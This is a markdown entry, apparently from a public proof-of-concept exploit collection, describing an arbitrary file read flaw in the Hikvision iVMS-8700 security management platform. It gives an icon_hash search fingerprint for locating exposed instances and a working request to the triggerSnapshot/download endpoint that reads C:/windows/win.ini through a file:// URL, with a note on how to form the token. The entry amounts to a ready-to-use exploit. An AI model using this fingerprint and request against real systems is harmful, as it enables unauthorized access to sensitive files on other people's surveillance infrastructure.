Awesome-POC/网络设备漏洞/HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞.md
2024-11-06 14:10:36 +08:00

29 lines
675 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Hikvision iVMS-8700综合安防管理平台 download 任意文件下载漏洞
## 漏洞描述
Hikvision iVMS-8700综合安防管理平台存在任意文件读取漏洞攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息
## 漏洞影响
Hikvision iVMS-8700综合安防管理平台
## 网络测绘
```
icon_hash="-911494769"
```
## 漏洞复现
登录页面
![image-20230704110859434](images/image-20230704110859434.png)
验证POC token 为 Url md5
```
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
```
![image-20230704111021242](images/image-20230704111021242.png)